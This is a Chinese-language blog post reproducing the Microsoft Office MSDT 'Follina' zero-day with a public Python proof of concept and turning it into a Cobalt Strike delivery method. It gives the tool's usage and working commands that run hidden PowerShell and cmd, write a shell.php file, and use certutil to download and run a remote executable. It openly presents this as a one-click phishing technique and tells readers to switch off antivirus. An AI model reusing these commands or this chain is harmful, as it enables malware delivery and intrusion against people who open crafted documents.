微軟MSDT零日漏洞上線CS

發(fā)布時(shí)間 2022-06-02

一、漏洞簡(jiǎn)介

近日,網(wǎng)絡(luò)安全研究員nao_sec發(fā)現(xiàn)了一個(gè)從白俄羅斯上傳至分析服務(wù)網(wǎng)站VirusTotal的惡意Word文檔(文件名為" 05-2022-0438.doc ")。這個(gè)文檔使用遠(yuǎn)程模板特性獲取HTML,然后使用“ms-msdt”方案執(zhí)行PowerShell代碼。

隨后,知名網(wǎng)絡(luò)安全專家Kevin Beaumont發(fā)表了對(duì)該漏洞的分析?!霸撐臋n使用 Word遠(yuǎn)程模板功能從遠(yuǎn)程網(wǎng)絡(luò)服務(wù)器檢索HTML文件,該服務(wù)器又使用ms-msdt MSProtocol URI方案加載一些代碼并執(zhí)行一些 PowerShell”,在他的分析中這樣寫道,“這里發(fā)生的一些事情比較復(fù)雜,而首當(dāng)其沖的問題是即使禁用了宏,Microsoft Word 也會(huì)通過msdt(一種支持工具)執(zhí)行代碼。受保護(hù)的視圖確實(shí)起了作用,可盡管如果您將文檔更改為RTF形式,它甚至無需打開文檔,僅通過資源管理器中的預(yù)覽選項(xiàng)卡即可運(yùn)行,更不用說受保護(hù)的視圖了?!?/p>

二、影響范圍

據(jù)了解,該零日漏洞會(huì)影響多個(gè)Microsoft Office版本,包括Office、Office2016和Office 2021。

以上說明來源:https://www.freebuf.com/articles/334861.html

復(fù)現(xiàn)運(yùn)行環(huán)境應(yīng)該關(guān)閉防火墻殺毒軟件等安全應(yīng)用,會(huì)被攔截;

POC來源地址:https://github.com/chvancooten/follina.py

三、使用說明

python .\follina.py -h
用法:follina.py [-h] -m {command,binary} [-b BINARY] [-c COMMAND] [-u URL] [-H HOST] [-p PORT]

選項(xiàng):
  -h, --help 顯示此幫助信息并退出

所需參數(shù):
  -m {命令,二進(jìn)制},--mode {命令,二進(jìn)制}
                        執(zhí)行模式,可以是“二進(jìn)制”以加載(遠(yuǎn)程)二進(jìn)制文件,或“命令”以運(yùn)行編碼的 PS 命令

二進(jìn)制執(zhí)行參數(shù):
  -b 二進(jìn)制,--二進(jìn)制二進(jìn)制

命令執(zhí)行參數(shù):
  -c 命令,--command 命令
 在“命令”模式下執(zhí)行的編碼命令

可選參數(shù):
  -u URL, --url URL 生成的文檔應(yīng)該在其中檢索您的有效負(fù)載的主機(jī)名或 IP 地址,默認(rèn)為“l(fā)ocalhost”
  -H HOST, --host HOST Web服務(wù)器監(jiān)聽的接口,默認(rèn)為所有接口(0.0.0.0)
  -p PORT, --port PORT 運(yùn)行 HTTP 服務(wù)器的端口,默認(rèn)為 80


使用舉例:

# 執(zhí)行本地二進(jìn)制
python .\follina.py -m 二進(jìn)制 -b \windows\system32\calc.exe

# 在 linux 上你可能需要轉(zhuǎn)義反斜杠
python .\follina.py -m 二進(jìn)制 -b \\windows\\system32\\calc.exe

# 從文件共享中執(zhí)行二進(jìn)制文件
python .\follina.py -m binary -b \\localhost\c$\windows\system32\calc.exe

# 執(zhí)行任意powershell命令
python .\follina.py -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echoowned > c:\users\public\owned.txt'"

# 在默認(rèn)接口(所有接口,0.0.0.0)上運(yùn)行 Web 服務(wù)器,但告訴惡意文檔在 http://1.2.3.4/exploit.html 檢索它
python .\follina.py -m 二進(jìn)制 -b \windows\system32\calc.exe -u 1.2.3.4

# 只在 localhost 上運(yùn)行網(wǎng)絡(luò)服務(wù)器,在端口 8080 而不是 80
python .\follina.py -m 二進(jìn)制 -b \windows\system32\calc.exe -H 127.0.0.1 -P 8080

四、環(huán)境配置

虛擬機(jī)Windows server 2019(請(qǐng)?jiān)跍y(cè)試環(huán)境運(yùn)行)

OFFICE 2019專業(yè)版

關(guān)閉火絨等殺毒軟件、關(guān)閉Defender

五、上線過程

第一次運(yùn)行會(huì)生成clickme.docx文件以及WWW文件夾,exploit.html文件就在WWW文件夾里面, -WindowStyle hidden -ArgumentList是靜默運(yùn)行,所以看不到cmd界面,更加隱蔽。

命令:python .\follina.py -m binary -b \\localhost\c$\windows\system32\calc.exe   會(huì)彈出計(jì)算器,說明漏洞復(fù)現(xiàn)成功,如下:

1654055423_6296e1ffede076b4f7327.png


既然可以彈出計(jì)算器,我有一個(gè)思路,寫入shell文件或者執(zhí)行CMD,并執(zhí)行命令進(jìn)行遠(yuǎn)程服務(wù)器下載CS木馬運(yùn)行,這樣就能夠達(dá)到點(diǎn)擊即上線,釣魚一絕(不考慮查殺原因)。

寫入shell.php

命令:python .\follina.py -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo cmd_test > c:\users\public\shell.php'"  如下

1654054985_6296e049f211a589eb0f3.png

上線運(yùn)行CS

命令:python .\follina.py -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c certutil -urlcache -split -f http://127.0.0.1:8080/test.exe&start test.exe'"

1654060819_6296f713aaf8d16a70c56.png

六、總結(jié)

總體來說如果能夠解決報(bào)毒問題,該漏洞還是有較大的操作空間。